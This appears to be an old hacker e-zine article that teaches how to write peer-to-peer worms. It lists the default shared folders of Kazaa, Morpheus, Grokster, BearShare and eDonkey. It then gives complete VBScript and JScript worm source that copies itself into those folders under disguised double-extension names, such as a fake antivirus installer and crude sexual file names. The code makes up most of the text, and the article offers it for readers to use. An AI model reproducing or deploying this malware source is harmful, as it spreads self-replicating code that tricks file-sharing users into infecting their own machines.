The Revoluti0n
| last article | table of contents | next article |
|---|
| last article | table of contents | next article |
|---|
p2p worm tutorial by Kefi
Shit in it:
1.how they work
2.Common p2p programs and their Shared Folders
3.examples (vbs,js)
1. How P2P worms work
P2P worms spread via Peer-to-Peer(P2P) programs. Since P2P programs
were poorly created and don't filter things like "Biggie Tupok -
Remix.mp3.vbs" the worms are able to place themselves into the P2P
shared folder as various file types. And when the file name is searched
for "Biggie Tupok - Remix.mp3" will come up, without the ".vbs".
2. 7 Common P2P Programs and their Shared Folders
P2P worms exploit the fact that most computer users are idiots, and
don't know how to change their shared folder. So P2P worms assume that
the infected user's "shared folder" is the default folder. Below are
the most common P2P programs and their default Shared Folder's.
- Kazaa Media Desktop
- C:\Program Files\KMD\My Shared Folder
- Kazaa
- C:\Program Files\Kazaa\My Shared Folder
- Kazaa Lite
- C:\Program Files\KaZaA Lite\My Shared Folder
- Morpheus
- C:\Program Files\Morpheus\My Shared Folder
- Grokster
- C:\Program Files\Grokster\My Grokster
- BearShare
- C:\Program Files\BearShare\Shared
- Edonkey
- C:\Program Files\Edonkey2000\Incoming
3.Examples
Writing P2P worms is very easy. All you really have to do is copy the
worm into different places, and attempt to mask their extension by
adding ".mp3.vbs" or ".exe.js" to the end of the worm's copy.
Visual Basic Script Example:
This worm will spread via the 7 common P2P programs with 3 different files.
Set fso = CreateObject("Scripting.FileSystemObject")
MyWorm = (WScript.ScriptFullName)
KMD = ("C:\Program Files\KMD\My Shared Folder")& "\"
Kazaa = ("C:\Program Files\Kazaa\My Shared Folder") & "\"
KazaaLiteL = ("C:\Program Files\KaZaA Lite\My Shared Folder") & "\"
Morpheus = ("C:\Program Files\Morpheus\My Shared Folder") & "\"
Grokster = ("C:\Program Files\Grokster\My Grokster") & "\"
BearShare = ("C:\Program Files\BearShare\Shared") & "\"
Edonkey = ("C:\Program Files\Edonkey2000\Incoming") & "\"
if fso.folderexists(KMD) then
fso.copyfile MyWorm, KMD & "vagina.jpg.vbs"
fso.copyfile MyWorm, KMD & "anti-virus installer.exe.vbs"
fso.copyfile MyWorm, KMD & "Emeinem - Fuck Me In The Ass.mp3.vbs"
end if
if fso.folderexists(Kazaa) then
fso.copyfile MyWorm, Kazaa & "vagina.jpg.vbs"
fso.copyfile MyWorm, Kazaa & "anti-virus installer.exe.vbs"
fso.copyfile MyWorm, Kazaa & "Emeinem - Fuck Me In The Ass.mp3.vbs"
end if
if fso.folderexists(KazaaLite) then
fso.copyfile MyWorm, KazaaLite & "vagina.jpg.vbs"
fso.copyfile MyWorm, KazaaLite & "anti-virus installer.exe.vbs"
fso.copyfile MyWorm, KazaaLite & "Emeinem - Fuck Me In The Ass.mp3.vbs"
end if
if fso.folderexists(Morpheus) then
fso.copyfile MyWorm, Morpheus & "vagina.jpg.vbs"
fso.copyfile MyWorm, Morpheus & "anti-virus installer.exe.vbs"
fso.copyfile MyWorm, Morpheus & "Emeinem - Fuck Me In The Ass.mp3.vbs"
end if
if fso.folderexists(Grokster) then
fso.copyfile MyWorm, Grokster & "vagina.jpg.vbs"
fso.copyfile MyWorm, Grokster & "anti-virus installer.exe.vbs"
fso.copyfile MyWorm, Grokster & "Emeinem - Fuck Me In The Ass.mp3.vbs"
end if
if fso.folderexists(BearShare) then
fso.copyfile MyWorm, BearShare & "vagina.jpg.vbs"
fso.copyfile MyWorm, BearShare & "anti-virus installer.exe.vbs"
fso.copyfile MyWorm, BearShare & "Emeinem - Fuck Me In The Ass.mp3.vbs"
end if
if fso.folderexists(Edonkey) then
fso.copyfile MyWorm, Edonkey & "vagina.jpg.vbs"
fso.copyfile MyWorm, Edonkey & "anti-virus installer.exe.vbs"
fso.copyfile MyWorm, Edonkey & "Emeinem - Fuck Me In The Ass.mp3.vbs"
end if
JavaScript Script Example:
This worm will spread via the 7 common P2P programs with 3 different files.
var MyWorm,KMD,Kazaa,KazaaLite,Morpheus,Grokster,BearShare,Edonkey;
var fso = new ActiveXObject("Scripting.FileSystemObject");
MyWorm = (WScript.ScriptFullName);
KMD = ("C:\\Program Files\\KMD\\My Shared Folder") + "\\";
Kazaa = ("C:\\Program Files\\Kazaa\\My Shared Folder") + "\\";
KazaaLite = ("C:\\Program Files\\KaZaA Lite\\My Shared Folder") + "\\";
Morpheus = ("C:\\Program Files\\Morpheus\\My Shared Folder") + "\\";
Grokster = ("C:\\Program Files\\Grokster\\My Grokster") + "\\";
BearShare = ("C:\\Program Files\\BearShare\\Shared") + "\\";
Edonkey = ("C:\\Program Files\\Edonkey2000\\Incoming") + "\\";
if(fso.folderexists(KMD)){
fso.copyfile(MyWorm, KMD + "vagina.jpg.js");
fso.copyfile(MyWorm, KMD + "anti-virus installer.exe.js");
fso.copyfile(MyWorm, KMD + "Emeinem - Fuck Me In The Ass.mp3.js");
}
if(fso.folderexists(Kazaa)){
fso.copyfile(MyWorm, Kazaa + "vagina.jpg.js");
fso.copyfile(MyWorm, Kazaa + "anti-virus installer.exe.js");
fso.copyfile(MyWorm, Kazaa + "Emeinem - Fuck Me In The Ass.mp3.js");
}
if(fso.folderexists(KazaaLite)){
fso.copyfile(MyWorm, KazaaLite + "vagina.jpg.js");
fso.copyfile(MyWorm, KazaaLite + "anti-virus installer.exe.js");
fso.copyfile(MyWorm, KazaaLite + "Emeinem - Fuck Me In The Ass.mp3.js");
}
if(fso.folderexists(Morpheus)){
fso.copyfile(MyWorm, Morpheus + "vagina.jpg.js");
fso.copyfile(MyWorm, Morpheus + "anti-virus installer.exe.js");
fso.copyfile(MyWorm, Morpheus + "Emeinem - Fuck Me In The Ass.mp3.js");
}
if(fso.folderexists(Grokster)){
fso.copyfile(MyWorm, Grokster + "vagina.jpg.js");
fso.copyfile(MyWorm, Grokster + "anti-virus installer.exe.js");
fso.copyfile(MyWorm, Grokster + "Emeinem - Fuck Me In The Ass.mp3.js");
}
if(fso.folderexists(BearShare)){
fso.copyfile(MyWorm, BearShare + "vagina.jpg.js");
fso.copyfile(MyWorm, BearShare + "anti-virus installer.exe.js");
fso.copyfile(MyWorm, BearShare + "Emeinem - Fuck Me In The Ass.mp3.js");
}
if(fso.folderexists(Edonkey)){
fso.copyfile(MyWorm, Edonkey + "vagina.jpg.js");
fso.copyfile(MyWorm, Edonkey + "anti-virus installer.exe.js");
fso.copyfile(MyWorm, Edonkey + "Emeinem - Fuck Me In The Ass.mp3.js");
}
And that's all for now. Please don't use the worms directly from this tutorial.
At least ask about it first.
Thanks SPTH for the P2P tut. idea!
Kefi.[rRlf]